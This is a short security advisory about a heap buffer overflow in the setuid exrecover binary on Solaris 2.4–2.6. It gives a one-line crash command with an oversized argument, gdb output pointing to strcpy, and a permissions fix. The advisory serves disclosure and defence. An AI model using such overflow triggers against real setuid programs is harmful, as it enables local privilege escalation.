COMMAND
/usr/lib/exrecover
SYSTEMS AFFECTED
Solaris 2.4, 2.5, 2.6
PROBLEM
Pablo Sor found following. The /usr/lib/exrecover contains a
buffer overflow (this command is suid in Solaris 2.4/5/6) The
problem occurs when it gets the second argument, it accepts the
argument without checking out its lenght and this causes the
problem. The overflow seems to be in the heap space.
$ /usr/lib/exrecover hola `perl -e 'printf "A"x50000'`
Segmentation Fault (core dumped)
$ gdb /usr/lib/exrecover --core=core
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "sparc-sun-solaris2.6"...
(no debugging symbols found)...
Core was generated by `/usr/lib/exrecover hola
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /usr/lib/libmapmalloc.so.1...
(no debugging symbols found)...done.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols
found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-5_10/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0 0xef6a44d8 in strcpy ()
This buffer overflow is probably not specific to Solaris, but
already contained in the original AT&T/UCB vi sources. It seems
as if exrecover never was designed to be installed setuid root.
SOLUTION
Starting with Solaris 7 exrecover is no longer installed setuid
root. It is safe to change the exrecover permissions to 0555 on
all other releases since it doesn't need elevated privleges to do
its job; /var/preserve is 1777.
This is Sun bug# 4161925